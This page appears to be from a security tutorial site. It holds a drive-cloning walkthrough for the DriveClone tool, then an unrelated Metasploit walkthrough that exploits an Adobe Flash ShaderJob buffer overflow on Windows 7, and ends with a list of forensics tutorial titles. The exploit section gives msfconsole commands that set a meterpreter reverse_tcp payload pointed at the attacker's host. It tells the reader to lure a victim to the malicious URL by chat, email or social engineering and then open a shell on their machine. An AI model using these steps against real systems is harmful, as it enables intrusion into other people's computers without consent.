How to Clone Drive for Forensics Purpose

DriveClone is a hard disk (HDD) & solid state drive (SSD) cloning and migration software. DriveClone is a time & money saver for server migration, raid upgrading, and system cloning

DriveClone automatically clones your entire machine, including system files, applications, preferences, emails, music, photos, movies, documents, and all partitions. But what makes DriveClone different from other disk cloning applications is that it not only clones all data on a system, it automatically defrags all files, removes junks, resizes partitions, and only clone the files that have been changed since last cloning.

Drive Clone Key Features

  • Keepnew! An exact copy of Hard disk or SSD
  • Clone different sizes disks
  • Schedule incremental cloningnew!
  • Near real-time MirrorDrivenew!
  • Rapid cloning (2X faster)new!
  • Partition 4K alignednew!
  • Tools to fix boot issues & retain GUIDnew!
  • DriveClone data migration is in Windows
  • Allows user keep working during migration process
  • Cloned disk is immediately bootable
  • Volume and sector-by-sector cloning
  • Smart cloningunique saves up to 70GB by excluding temp and redundant files
  • Universal cloningunique allows booting on other machine
  • Turn your external hard drive into a Mirror Drive unique
  • Factory Recovery Partition Cloning unique
  • Keep up to 99 File Versions on Mirror Driveunique (MirrorDrive)
  • Defrag Cloning uniquewill increase life-span & performance
  • Directly convert a PC to VMware & Hyper-v virtual machines unique
  • Support SecureBoot, GPT, UEFI, and Dynamic Diskunique
  • Support all sizes (64GB/128GB/260GB/500GB/750GB/1TB/2TB/4TB or larger)
  • Support all drives (Seagate, WDC, Fujitsu, Hitachi, etc)
  • Raid to Hard disk/SSD cloning and migration; and vice versa

First Download DriveClone from here and install in your pc .Drive Clone Workstation is designed to completely copy all files, applications and Windows system from one Hard Drive/SSD/Flash to another Hard Drive/SSD/Flash. You can easily clone your Hard Drive/SSD/Flash to a different size SSD drive (smaller or bigger) for better performance. Drive Clone Workstation will automatically adjust and resize partitions during cloning process to reduce the process complications.

Start DriveClone Workstation.

Double click on One Time Cloning. Clone Drive/Partition(s) duplicates one hard drive or SSD to another hard drive or SSD, and it is immediately bootable. It eliminates the need of re-installing the operating system, drivers and applications when upgrading to a new hard drive or SSD with only a few mouse clicks.

Now Select a Source Disk/Partition and then a Destination Disk/Partition. Click on NEXT to Proceed   further.

It will Show the window popup. Click on YES to continue.

Now it will show two options i.e. Rapid Cloning and Normal Cloning. Check either Rapid Cloning or Normal Cloning and click on Next.

Select Start or Previous option. Previous option is used to modify the current settings. And Start option is used to proceed further.

 Now it will show One- Time cloning process.

Now it will show the message cloning completed. Click on Finish.

Now select the target drive and it will show the contents of cloned drive.

AuthorMukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can [email protected]

Hack Remote Windows PC using Adobe Flash Player ShaderJob Buffer Overflow

This module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the “width” attribute of the ShaderJob after starting the job it’s possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169, Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169, and Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.

Exploit Targets

Windows 7

Firefox 38.0.5

Adobe Flash 17.0.0.169

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/windows/browser/adobe_flash_shader_job_overflow

msf exploit (adobe_flash_shader_job_overflow)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_shader_job_overflow)>set lhost 192.168.0.160 (IP of Local Host)

msf exploit (adobe_flash_shader_job_overflow)>set srvhost 192.168.0.160

msf exploit (adobe_flash_shader_job_overflow)>set uripath /

msf exploit (adobe_flash_shader_job_overflow)>exploit

 

Now an URL you should give to your victim http://192.168.0.160:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.160:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into Victims command prompt.

 

Best of Computer Forensics Tutorials

How to Clone Drive for Forensics Purpose

Forensics Investigation of Deleted Files in a Drive

Comparison of two Files for forensics investigation by Compare IT

Live Forensics Case Investigation using Autopsy

How to Install Digital Forensics Framework in System

How to Mount RAW Image and ISO Image as a Drive using OSF Mount

Forensics Investigation of Facebook, Skype, and Browsers in RAW Image using IEF (Internet Evidence Finder)

How to Create Drive Image for Forensic Purpose using Forensic Replicator

Outlook Forensics Investigation using E-Mail Examiner

How to Preserve Forensics Image file Timestamp

How to identify any Suspicious changes to files or directory (Disk Drive Signature)

Forensics Investigation of Evidence RAW Image using OS Forensics Tool

How to Create and Convert RAW Image in Encase and AFF Format using Forensics Imager

How to Mount Forensics image as a Drive using P2 eXplorer Pro

How to Convert Encase, FTK, DD, RAW, VMWare and other image file as Windows Drive

How to gather Forensics Investigation Evidence using ProDiscover Basic

How to study Forensics Evidence of PC using P2 Commander (Part 2)

How to Collect Forensics Evidence of PC using P2 Commander (Part 1)

How to Create Forensics Image of PC using R-Drive Image

Forensic Investigation of victim pc using Autopsy

Forensic Investigation of any Twitter account

How to Perform Forensic Investigation on YouTube

How to perform Forensic Investigation on user Linkedin Account

Forensic Investigation of any FaceBook Profile

How to create copy of Suspects Evidence Using (FTK Imager)

How to find the usage of files in Remote victim PC (Remote PC Forensics)

How to Collect Telephonic Evidence in Victim PC

How to Collect Email Evidence in Victim PC (Email Forensics)

Forensics Analysis of Social Media Sites like Facebook, Twitter, LinkedIn

Forensics Investigation of Remote PC (Part 2)

Forensics Investigation of Remote PC (Part 1)

Volatility – An advanced memory forensics framework

DumpIt – RAM Capture Tool

How to View Last Activity of Your PC

How to view Date & Time of any Captured JPEG Image

Antivirus Forensics Tools

BFT (Browser Forensic Tool )

How to View System Reboot Date and Time

Hacking Computer forensics Exposed

List of Computer Forensics Tools (Part 1)

Find Last Connected USB on your system (USB Forensics)